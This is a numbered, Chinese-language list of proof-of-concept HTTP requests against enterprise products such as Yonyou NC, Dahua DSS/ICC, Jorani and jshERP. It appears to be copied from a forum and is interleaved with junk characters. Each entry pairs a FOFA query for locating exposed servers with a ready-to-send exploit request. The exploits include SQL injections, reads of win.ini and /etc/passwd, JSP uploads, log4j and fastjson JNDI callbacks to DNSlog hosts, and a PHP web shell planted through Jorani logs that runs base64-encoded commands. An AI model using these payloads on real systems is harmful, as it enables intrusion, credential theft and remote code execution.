: g3 ~& g9 e! d. Z+ p; i. \- I11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入, _- n2 g3 b6 {6 C' p% Y
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"& q% R5 W# D% d% f/ @5 K
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1; y; u. a! @5 D. M8 J3 W
Host: 127.0.0.1' u0 q9 i# y. k  L9 @
Pragma: no-cache
# b* H0 ]1 ?- s4 X3 QCache-Control: no-cache( `' w0 G: N3 r. g, ~
Upgrade-Insecure-Requests: 1
$ ]; U& X# I& u/ N9 k% [( u/ A" AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' k1 A7 f: V- }5 U, T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 B: G8 q; z) v# }  h1 ^: oAccept-Encoding: gzip, deflate
, {* }* p. C9 N% x8 ~/ E  }Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
& c. q) d& i! ?' t4 a# g, pConnection: close
% b- ?" I" t0 |( ~3 P; l3 Q) u/ y, o. }& u, a
5 b5 d* l- [- ^" e# P$ w
12. Jorani < 1.0.2 远程命令执行6 Z5 B8 z  h( z* J- M9 n
FOFA:title="Jorani"8 `9 z. I8 _% k5 L" i9 i
第一步先拿到cookie
; _3 {/ f- [8 P* [/ iGET /session/login HTTP/1.1
( J# q) E3 l$ U( p0 P0 BHost: 192.168.190.30
2 O, r! a, b9 v: k; B, SUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 Q* i2 |5 w  s0 F
Connection: close
$ i* Z, {4 K$ b% \7 v" y( K& XAccept-Encoding: gzip
/ I- L4 c, N3 m$ X* I7 P2 m( z
* y/ l3 X8 N1 o
- Q2 I; }8 O* r% x' w+ }+ g响应中csrf_cookie_jorani用于后续请求
4 ]$ v8 x* Y* n& xHTTP/1.1 200 OK
8 \9 n& ]+ J- lConnection: close  J$ k% V  q8 E) m/ s9 p6 F" @/ Z
Cache-Control: no-store, no-cache, must-revalidate
4 b) h! c/ |# Z1 k4 L2 k" VContent-Type: text/html; charset=UTF-8
7 V; W+ v  J/ DDate: Tue, 24 Oct 2023 09:34:28 GMT! |$ ]- L2 [! q8 R- P* n0 ]4 q
Expires: Thu, 19 Nov 1981 08:52:00 GMT2 p7 P$ _8 c& k- W! b# `
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
% N' l. @: _, I; e+ c# J. TPragma: no-cache, G' S# U, n. h$ @# ]* l( A' M
Server: Apache/2.4.54 (Debian)
4 b" V. _5 m! fSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/( I$ R% P+ s- L/ R
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
+ L9 R" \/ H# E+ r+ kVary: Accept-Encoding
2 o5 p4 q7 @0 F( ]2 \# S- Y. B. R" E" K% K* v" M1 U5 S
: l( A6 U- w6 u5 B' z
POST请求,执行函数并进行base64编码: }- v) v2 S9 E
POST /session/login HTTP/1.1! J5 k6 n- e* b: A
Host: 192.168.190.30
& ?2 A# X7 _- k8 ^  Q3 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36- @, l* E: ?% Q: ^9 q, E
Connection: close8 Q: r4 M* p7 p' d6 \$ ?- E
Content-Length: 252
1 c  ]  Y& i% p. g  l' ]Content-Type: application/x-www-form-urlencoded4 J* v# d2 ]' {" x
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
8 b0 H. E7 T! w4 E+ E3 GAccept-Encoding: gzip
" y. i! _$ n5 _+ r0 }% A! S0 D: A0 I" G& z" D. {2 v1 Q
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
8 e! q# Y5 ^3 B, x" N  `& k& N9 p  o4 S3 h

! _$ S% L- |3 Y5 ~7 r
- B* R, J1 b: V) N向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串$ P4 n" C4 `0 q" w' q6 f* a
GET /pages/view/log-2023-10-24 HTTP/1.1/ H# d% x2 X( S* m1 B! I- r
Host: 192.168.190.301 u5 y( u- Q: n" ^; Q, j0 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& L, E+ Z3 r9 w4 V. m( r
Connection: close- ?( ^4 h1 e8 |& t1 E* k5 U8 f' `
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 \$ [) t3 j* a- H. k. FK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=, l' Q( l  v8 F  R, ^, b: g
X-REQUESTED-WITH: XMLHttpRequest/ s( H+ o) m* M# k. C" D
Accept-Encoding: gzip# ^" p3 `* V; [& [) A
7 B% @: m3 W8 f; H' o9 E4 V6 a  p* ]

4 B( E. V9 X% `, F5 v13. 红帆iOffice ioFileDown任意文件读取
) f2 R+ q2 y: s& L" ~. {FOFA:app="红帆-ioffice"& i+ K( f# d7 k( T4 O/ D+ T
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1, ]( m3 r) d% Y
Host: x.x.x.x; t9 R' @9 U- |$ }; l( X# w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 w9 J5 ^7 ?6 }9 I
Connection: close1 b: [9 d8 z7 S: y4 `& p4 @
Accept: */*8 K7 h4 s$ h  N; k8 d) H+ T- J
Accept-Encoding: gzip
' ~% x; @& H! J2 u1 C% R4 C3 p- c/ Y! X4 h  w9 E  ?

& N. D. ^2 m! R3 |14. 华夏ERP(jshERP)敏感信息泄露
& X4 t! S: i/ E# l3 ~* a$ OFOFA:body="jshERP-boot"4 R5 C1 z! W( Y/ ^4 s6 P8 b0 ?
泄露内容包括用户名密码1 W  U  a% e/ p& j5 H6 \
GET /jshERP-boot/user/getAllList;.ico HTTP/1.15 Z/ V1 q6 E7 T8 @+ T, Y7 x' {
Host: x.x.x.x
/ r% h$ `$ m2 _. \( q: j5 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.364 X. L0 f6 l* l0 H+ v+ n2 S
Connection: close
! l# z+ }- V4 I1 D3 d+ W- y6 oAccept: */*
% v' Q0 L. }/ r& X, zAccept-Language: en  `$ e4 j: ?$ _9 |) _
Accept-Encoding: gzip( W8 z" z5 N# ~6 H: Q$ w# n

4 h* H+ H# ]! a0 W' J4 _
8 m& n/ k3 H% @15. 华夏ERP getAllList信息泄露8 H) F4 p: n% X
CVE-2024-0490; T4 G: A, A) S) L
FOFA:body="jshERP-boot"
7 n) g5 @* Y$ {2 Y1 G6 f泄露内容包括用户名密码  n" O0 Z' `7 V; X; C5 x6 a
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
' ]+ b0 E" N7 f( VHost: 192.168.40.130:100
  c3 P5 l! m7 k5 T: X. j* TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" ~# i" g* v5 I' E  e: G9 V6 l1 k  y
Connection: close* ^) i# F  ]$ h6 }9 K
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8" J( Z3 e1 S9 d5 p9 m% \  n2 X
Accept-Language: en2 L0 q: S- S8 v5 ^
sec-ch-ua-platform: Windows
% E5 `$ T* V7 h" u  _3 ?Accept-Encoding: gzip0 u! K+ E$ Y- D$ p& t1 D% i) L

( P& |% i# ^1 c& Q3 i7 ~
& O, i$ K% e( W* ?16.  红帆HFOffice医微云SQL注入
+ n) ]! ~, }; q! W0 w2 IFOFA:title="HFOffice"
& v4 c2 i# D1 N) |% l* ~* U. R. n- e' Lpoc中调用函数计算1234的md5值
. J, N1 G. s& q9 LGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1) h+ o% K' s4 K/ t; L0 E: ~
Host: x.x.x.x5 ^! \, ?# T* G% T. R. J
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36' M* Y/ d% g7 _6 K/ X: E* Y
Connection: close9 ~3 }3 ]3 ^% I3 ]4 w/ ~
Accept: */*! Q3 o' w0 v; D, c* N! ^/ O
Accept-Language: en( m% z3 O5 u+ _) x9 @! t+ Q( ^3 R
Accept-Encoding: gzip
) ^: \# f7 g* g5 b- T/ L$ B& }
2 @' v* D% d! F' u
! f3 x$ F; u3 q- p0 ]17. 大华 DSS itcBulletin SQL 注入
7 G/ H$ g' r7 K$ u) lFOFA:app="dahua-DSS"
* Z$ f0 K# H4 D1 z) [- rPOST /portal/services/itcBulletin?wsdl HTTP/1.1
. ~9 W9 |- [3 yHost: x.x.x.x6 n' z* e4 B6 m/ Q$ u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 Y1 c: i! W0 m$ [+ ^+ ~Connection: close3 ~5 |- }* z7 j9 b. y8 [8 P
Content-Length: 345
5 o) S5 E3 c) |" ?# uAccept-Encoding: gzip8 r- w/ v9 e% Y: R8 n
) t" @, Z  Z1 [2 e8 y0 N. d
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
1 C0 Y8 C8 O, M7 E! s<s11:Body>! C% f! v5 W& o( x; N: i
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>' D, }3 }& e8 {" V( V* }' x
      <netMarkings>3 Z. t; [4 s. T, Z" D7 p2 l
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=17 ]7 d: X* x. Z5 P0 f3 B2 ~
      </netMarkings>& L: x9 P  T. i4 ?* K# p" N/ _
    </ns1:deleteBulletin>
+ P; u& x# i. k* z6 ^  </s11:Body>
7 B& S: K9 B  [3 ]  U. x$ S</s11:Envelope>
5 b! T3 G% O3 h5 |( z5 b, x! ^' G2 N3 x
- F2 u0 _0 e7 S- o0 V0 T1 k
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露  \/ N) b% {4 l" g
FOFA:app="dahua-DSS"
; D& T5 L. L) U8 f  a5 IGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
; X  F" s' n2 P+ n  UHost: your-ip
, {* D; j% R- Q: G" VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Q! \: i% L, _% ZAccept-Encoding: gzip, deflate
, h( y9 h9 u) K( }9 P2 ^3 H- kAccept: */*3 q& k8 k1 z6 b# S5 d% W8 z
Connection: keep-alive; W2 x/ l* A0 y9 Y

+ f) N' A% k% ?1 R, ^1 J: J+ \- ]2 M& |

" N7 P5 t+ A2 M& X8 \19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
! [! H) X5 K2 xFOFA:app="dahua-DSS"
8 I0 Z5 v/ q6 ?' l0 B! t6 H- r( T# gGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.16 y- C7 O2 ^, u: g' L; c
Host:3 j. Z6 J8 g$ j% z% ~
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" w' _2 F; n6 l6 a4 p% b# d
Accept-Encoding: gzip, deflate
8 A0 S7 ?, w4 N$ xAccept: */*$ |2 F$ t6 R( f- W: B
Connection: keep-alive
) ?% s' K" l+ K6 w6 o% N/ M
: x/ O' {% Q& J  M  T# P" |) d4 V# |. w7 v
20. 大华ICC智能物联综合管理平台任意文件读取
* i. \" F9 J3 f! FFOFA:body="*客户端会小于800*"" r7 J  [; K+ |6 v+ P
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
! U5 b0 ?6 Y1 i: ]+ `Host: x.x.x.x5 I. x" }& e. Q1 W: `5 [1 u
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 @7 U2 ~/ |: P# c4 R3 }
Connection: close8 H" l- E0 q# t! g5 n
Accept: */*
2 Q/ S+ v+ }! lAccept-Language: en- J7 h8 @( q: X6 Q4 P# d
Accept-Encoding: gzip
! ^8 U0 K2 V4 u1 q+ G8 k
# y* b, ^$ v( p4 a4 V. E& q: N% N7 L/ s; V' f5 q
21. 大华ICC智能物联综合管理平台random远程代码执行
1 i7 M+ @3 q$ q0 aFOFA:icon_hash="-1935899595"
  A! Q) D( p" x9 TPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
3 l, |! p: O6 i- p% t- O  zHost: x.x.x.x8 g- G/ S4 J* _' `/ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% O( g  ]  f) Q: r
Content-Length: 161
/ [4 S3 {# x; e  I! S* R5 H- LAccept-Encoding: gzip
8 S# F9 q8 h; s9 l9 e( IConnection: close
: N" E0 d2 ~2 o& L8 L' M9 AContent-Type: application/json;charset=utf-8* u  L3 Z# u& T/ _* d  y5 ?# W

7 |' B( x" q- z{, x1 S8 c2 {" d& e
"a":{
/ s- {2 a* @$ V9 L   "@type":"com.alibaba.fastjson.JSONObject",+ W$ w# F- x/ |2 o1 O% [& D
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
/ u* T7 _4 K& w8 N* A0 W5 K  }""! U: c, k) |/ z1 _
}# k3 M& r4 z+ S) ^6 l* U7 Q. Z
5 u$ p2 Q- S& F% `

! b0 g7 [0 s4 ?1 v. Q4 _% z22. 大华ICC智能物联综合管理平台 log4j远程代码执行, u% |! _/ v) W: H5 Z1 k( H/ f4 r
FOFA:icon_hash="-1935899595"
' h" Z% N5 I! @, ], ~" a6 @POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1% p. U' z- u$ {, n& Y
Host: your-ip
4 ~9 w' W6 X$ D% G: Z( rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# I( @- O' f( uContent-Type: application/json;charset=utf-8
" H$ R# v" ^8 P) `, m# ~; R, z4 ^! i
{
; T; |  @! b; q" n! s. c"loginName":"${jndi:ldap://dnslog}"; h' r8 s( A' O8 A7 o. W3 i0 f
}
8 m: H: q1 U+ M, |' L
3 r' p# [- R8 L7 O& ^  }$ o% N3 G+ w+ `0 _

; T6 N) n5 C& t7 R8 ?* x23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
* U$ c8 L8 Y2 k, P; r1 a) @% k4 b* Y. aFOFA:icon_hash="-1935899595", U. M1 ]* ~" u) P' r) M0 [! j
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1# `+ R/ s0 U5 K  T$ `" K
Host: your-ip
; {  Q, |3 Q& B* AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 K. E6 y; e7 C; \8 }) s( i0 N& {
Content-Type: application/json;charset=utf-8/ L9 _7 p3 |% E; c* l$ ?6 d+ R
Accept-Encoding: gzip; t; F6 Y4 [: y
Connection: close7 r. e& t2 A+ N+ x9 G

$ W2 q, `; v/ M& Y7 U  F$ P" J5 e4 o{8 z: o( z+ L2 L( V$ U
    "a":{
% v, i7 G( j3 Z' }2 S+ Q5 z; H5 Z        "@type":"com.alibaba.fastjson.JSONObject",
6 K/ M6 {6 k" H# Z, y0 o       {"@type":"java.net.URL","val":"http://DNSLOG"}; \) V7 C2 x9 ~8 [
        }"", F% m$ M( E$ A& v- n
}) F) t( ?: f- j/ c8 w9 r

4 s- Z* F; A* K
' X% V3 N: @3 I6 ?5 |  Z& B: g( P24. 用友NC 6.5 accept.jsp任意文件上传5 |, q' F5 r4 F- p
FOFA:icon_hash="1085941792") B8 u+ M8 ~7 r) \
POST /aim/equipmap/accept.jsp HTTP/1.1
' @- c- g' V9 v! y+ E1 a/ pHost: x.x.x.x
0 e/ A) E5 n- O3 I0 u& QUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36  C8 ?* Q2 r& _6 _, e3 ~& n& M7 p
Connection: close  ~" R" f5 i9 F/ R; F2 U7 u
Content-Length: 449
4 W; w& \/ t0 H- i$ GAccept: */*1 a! v* |+ {8 `2 f0 K; V
Accept-Encoding: gzip
0 e0 `' ~+ V) S7 r8 H$ bContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# Q  q/ E4 Q, Z5 b

& v; n- c. V& v0 u-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
) {7 |, R8 \% |/ |2 w. MContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
0 i6 ^% W( E6 l" n7 i3 m! u4 kContent-Type: text/plain& p/ u& [! q- i- K8 @4 V# D

% O3 T* G1 J8 I( F# o, c" k* _( r<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>+ x0 f! P9 k0 i, b
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! u' c+ p4 T; j$ I/ m0 K3 C0 RContent-Disposition: form-data; name="fname"
& q% M4 L( e1 X, h9 t+ S5 _: b- ~5 k: u; t
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp- U3 Q0 {: f& C4 c2 d+ t
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--  J) F/ O7 Q! g. a. A" J

+ D# w1 u( D5 G2 C! |2 F- i9 f, B- i. @5 p- J2 e
25. 用友NC registerServlet JNDI 远程代码执行- ^( }& C. @: c6 z1 w
FOFA:app="用友-UFIDA-NC"
0 E+ T' y) J! S) Z$ fPOST /portal/registerServlet HTTP/1.1+ G5 M: L2 B! D3 ~4 T# w5 s
Host: your-ip
+ p5 ^2 z, |- SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
3 b0 J! t9 D# h: g! j- JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.92 s6 X" `6 Y4 Y. u- |- {6 D# k
Accept-Encoding: gzip, deflate4 }/ H5 ]4 P* @* x& W* V; P( b
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.67 P8 t2 ^) Y. p# p/ o
Content-Type: application/x-www-form-urlencoded
# J& ]: N2 S% @+ _6 A) w- l' m! S+ e" N# I* `, y5 U9 O% P9 T- r
type=1&dsname=ldap://dnslog
9 F- k& Y7 \1 s2 X, g
! ^" ~! J; S; x+ X; O. }
: `& o5 y0 n: K2 n+ W
1 U5 M3 i# u( l3 L# T! q26. 用友NC linkVoucher SQL注入  u# R9 Z( B4 S  N
FOFA:app="用友-UFIDA-NC"0 @5 p; G4 @, }
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 S# ~9 s* P' p7 u% uHost: your-ip* Z- o1 t( \' A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' e% X" E0 z0 V0 q. F0 r8 S) H
Content-Type: application/x-www-form-urlencoded
( }2 @3 F2 z2 lAccept-Encoding: gzip, deflate1 l8 P5 v6 d" J) r
Accept: */*
6 v! r( A! R% R  w+ `2 }* kConnection: keep-alive
: c/ P2 p! P, g4 L& H6 h1 q
, l: Y. h  P, u5 g8 W9 y  n  b+ @* g- H# f$ h, m% |
27. 用友 NC showcontent SQL注入
! P9 i% m, K$ KFOFA:icon_hash="1085941792"
1 B" m* O% q" R4 c2 U" _& vGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1/ [. f: }+ u/ F5 z8 Z5 }
Host: your-ip
, ^0 I* Z& P4 Z- X/ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 ~: j. N. Q) A% j
Accept-Encoding: identity
2 R, w6 M  I0 k0 XConnection: close0 A5 Q+ E; L1 ]
Content-Type: text/xml; charset=utf-8
% {& y, P$ ~" m; k/ [) A
2 [4 ^" [$ U9 I
: f6 g! K4 F* p3 E; `, t8 k0 B28. 用友NC grouptemplet 任意文件上传* D1 q* k' T/ @
FOFA:icon_hash="1085941792"
. d. h$ S+ e" s6 E8 ~+ }POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
  |; n' m( a5 T3 R3 GHost: x.x.x.x
0 }# [7 u& h, w0 i- \% {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36* e8 p9 T" \4 i5 Y  m$ h0 o
Connection: close
/ Z, W& d4 j, z: M8 ~* DContent-Length: 268
5 y" _; \( \' cContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
4 p! z0 ~; s. B: G% y, ^Accept-Encoding: gzip
, e  C- k0 k3 g+ o1 }% ~
# k6 K: i1 A/ Z------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
9 K$ H9 I$ a% [) @/ t) T( \Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
4 p# ^" f9 `, J: AContent-Type: application/octet-stream' V* i4 @  K: r6 F$ i6 j

; n; N$ V# Z+ C+ A0 L& b<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
" P, P( U$ m6 o: J/ D------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
  h3 @4 m  J3 Y+ s  |9 n. j' S7 z# `+ y; k/ j4 V# n% G, x" x
6 X2 V$ F  P( L+ j: v
/uapim/static/pages/nc/head.jsp! G. z) ]! A. v# y3 L

; A7 u) S, {! p0 l4 o  i* a( l29. 用友NC down/bill SQL注入
/ Q6 k) a8 c2 |9 {0 U, yFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 I# H* y% A; X& J: [: I# HGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
8 p) x3 x( j8 `- h- GHost: your-ip
4 A; k) s& j1 z' OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. r$ Z  Q) B& u4 R" i
Content-Type: application/x-www-form-urlencoded2 H. C, {+ h+ h, H/ W+ `
Accept-Encoding: gzip, deflate* A' h$ p5 C( z( |2 P
Accept: */*
' i, a: b8 Y- g; G  {2 |3 dConnection: keep-alive
7 A! Y/ S( C. n) p
2 ]7 U2 v: W3 r4 R5 h2 e
  s* O% J, _- U1 h: J& a4 P30. 用友NC importPml SQL注入5 [+ _. q+ K8 K1 D$ t3 G! Z( ]
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! D5 w! [' X# ePOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
2 F5 Q. @' f2 l. M$ W7 MHost: your-ip. T3 Z5 ]) H3 |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
0 h* B, N. ?1 F/ |4 ]) o3 D: hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36+ U( g4 _/ O2 U4 {9 [
Connection: close
; a* A0 u7 Q3 D. }6 x. @! l1 h' w
------WebKitFormBoundaryH970hbttBhoCyj9V
! Q- e, A9 Z1 Q# h# q3 aContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
' Z5 j' F. Q+ |% f: fContent-Type: image/jpeg; k, `# o/ }8 s5 y8 e+ w6 |/ l8 v. |
------WebKitFormBoundaryH970hbttBhoCyj9V--2 H3 v' h% Y) S7 U3 D

- S: B6 u, E  n% Y' ~0 b2 U) e+ L* L* f. w- j3 W/ a" [2 f2 d
31. 用友NC runStateServlet SQL注入( N4 w: d$ f% v- P* M& [4 I' n
version<=6.52 P/ @: _7 q" ~0 m- E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 w  ^; G% J( s2 C7 z
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.16 \( P+ y- ]8 ]9 y
Host: host
2 S- o. V# X3 Q  bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, H7 P: j, U/ i$ A. T
Content-Type: application/x-www-form-urlencoded+ E! p* C: S) q
3 S/ E, j/ C/ I6 ~; }' N/ }7 |9 P

  o* c6 a5 g) Z1 W8 ~32. 用友NC complainbilldetail SQL注入& r2 N8 O$ b& A9 H' [/ ]- x! t
version= NC633、NC65! H8 s( _* g+ F3 w+ a
FOFA:app="用友-UFIDA-NC"; Z4 f7 W5 d0 p* n8 i$ {+ t
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. I: m! H2 l2 MHost: your-ip) O5 E9 |) `" J- o7 k4 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ U  ]1 p" _6 ?" a4 GContent-Type: application/x-www-form-urlencoded
$ v  |) y* ?* E5 X3 P/ V3 D1 l- m. DAccept-Encoding: gzip, deflate
! f* H% L' Y# _1 D/ r' A8 [" v2 PAccept: */*
7 j6 r. r. Q( ?+ E2 EConnection: keep-alive1 Y( k& E; A( p( o5 x$ b9 o

" `* `2 K- z7 V7 O# s/ X  n; ]2 f( B( J. |! I$ X$ ?3 a/ r
33. 用友NC downTax/download SQL注入
. K5 q, }1 @- C" D9 dversion:NC6.5FOFA:app="用友-UFIDA-NC"" z5 h$ C5 A8 ]6 w, t
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
* C9 B5 x/ u4 u3 C$ X) `9 g  r, l$ g2 nHost: your-ip
3 W1 ]4 g$ r$ V' v7 \; OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- U8 z& p4 A2 k) g% s4 c* g
Content-Type: application/x-www-form-urlencoded
* E& l  A- L- q+ v6 dAccept-Encoding: gzip, deflate
5 J, M4 X( c7 X0 A- t& ~Accept: */*/ X* ?4 ]/ x! _9 x. ]1 @3 Z+ p
Connection: keep-alive
6 R) K* {, p/ L
0 i" M: X: @  T# T4 {) A8 R! w7 Q
$ l4 e, c# `- g6 Q2 T6 o- l4 x& y34. 用友NC warningDetailInfo接口SQL注入+ d6 u$ e; H) c  s5 y# s
FOFA:app="用友-UFIDA-NC": e2 B' h- T; ]0 l8 ?+ @
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 P9 r& K0 Z( W- BHost: your-ip' z. C" t# g' E$ ^/ H. }
